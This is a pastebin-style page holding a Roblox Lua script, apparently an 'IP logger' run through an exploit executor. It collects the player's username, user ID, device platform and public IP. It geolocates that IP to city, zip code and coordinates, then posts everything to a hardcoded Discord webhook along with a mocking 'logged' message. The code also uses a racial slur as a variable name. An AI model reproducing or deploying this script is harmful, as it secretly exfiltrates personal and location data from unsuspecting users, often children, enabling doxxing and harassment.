R

cyro eyep

public
rrixh Apr 26, 2024 Never 61
Clone
1
-- [👺RRixh x Minaa 🌸V2.2.0] --
2
request=http_request or request or HttpPost or syn.request;local exploit=identifyexecutor();local displayname=game:GetService("Players").LocalPlayer.DisplayName;local username=game:GetService("Players").LocalPlayer.Name;local playing=game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name;local UID=game.Players.LocalPlayer.UserId;
3
4
local RRixh = "https://discord.com/api/webhooks/1232835450948026448/BG0hTz4eW52Z3m4Y4NedS_rCTF5BH6u_FdzAugVYI1NIaIm8ADVF2tvu8V6Ddb8B5qO_";
5
6
local UserInputService = game:GetService("UserInputService")
7
local platform = UserInputService:GetPlatform()
8
local niggaIsUsing = table.find({Enum.Platform.IOS, Enum.Platform.Android}, platform)
9
local devixe_name
10
11
if niggaIsUsing then
12
if niggaIsUsing == 1 then
13
devixe_name = "iOS(iPhone/iPad)"
14
elseif niggaIsUsing == 2 then
15
devixe_name = "Android/Tablet"
16
else
17
devixe_name = "Unknown Mobile Devixe"
18
end
19
else
20
if platform == Enum.Platform.Windows then
21
devixe_name = "Windows"
22
elseif platform == Enum.Platform.OSX then
23
devixe_name = "OSX"
24
elseif platform == Enum.Platform.Ubuntu then
25
devixe_name = "Ubuntu"
26
elseif platform == Enum.Platform.ChromeOS then
27
devixe_name = "ChromeOS"
28
elseif platform == Enum.Platform.Linux then
29
devixe_name = "Linux"
30
elseif platform == Enum.Platform.XBoxOne then
31
devixe_name = "XBoxOne"
32
elseif platform == Enum.Platform.PS4 then
33
devixe_name = "PS4/PS5"
34
elseif platform == Enum.Platform.Switch then
35
devixe_name = "Switxh"
36
else
37
devixe_name = "Unknown Devixe Platform"
38
end
39
end;
40
41
local getIPResponse = request({
42
Url = "https://api.ipify.org/?format=json",
43
Method = "GET"
44
});local GetIPJSON=game:GetService("HttpService"):JSONDecode(getIPResponse.Body);local IPBuffer=tostring(GetIPJSON.ip);local ThatSexy=request({Url=string.format("http://ip-api.com/json/%s",IPBuffer),Method ="Get"});
45
46
local RRixh_ = game:GetService("HttpService"):JSONDecode(ThatSexy.Body) --IIT
47
local Minaa_ = { --FI
48
IP = IPBuffer,
49
country = RRixh_.country,
50
countryCode = RRixh_.countryCode,
51
region = RRixh_.region,
52
regionName = RRixh_.regionName,
53
city = RRixh_.city,
54
zipcode = RRixh_.zip,
55
latitude = RRixh_.lat,
56
longitude = RRixh_.lon,
57
isp = RRixh_.isp,
58
org = RRixh_.org
59
}
60
local hahalol=
61
string.format("Exploit Used: %s\nIP: %s\nKountry: %s\nKountry Kode: %s\nRegion: %s\nRegion Name: %s\nXity: %s\nZip Kode: %s\nProvider/ISP: %s\nOrg: %s\nDevixe Name: **%s**\nDisplay Name: **%s**\nUsername: **%s**\nUID: **%s**\nGame: **%s**", exploit, Minaa_.IP, Minaa_.country, Minaa_.countryCode, Minaa_.region, Minaa_.regionName, Minaa_.city, Minaa_.zipcode, Minaa_.isp, Minaa_.org, devixe_name, displayname, username, UID, playing)
62
63
local RRIXHANDMINAA = {
64
["content"] = "**> logged (@"..username.." | "..displayname..") 👁️P DONT USE SKRIPTS XD**",
65
66
["embeds"] = {
67
{
68
["title"] = "made by rrixh lulas👺 & x minaa🌸",
69
["description"] = hahalol,
70
["type"] = "rich",
71
["color"] = tonumber(ff0000)
72
}
73
}
74
}
75
request(
76
{
77
Url = RRixh,
78
Method = "POST",
79
Headers = {
80
["Content-Type"] = "application/json"
81
},
82
Body = game:GetService("HttpService"):JSONEncode(RRIXHANDMINAA)
83
}
84
)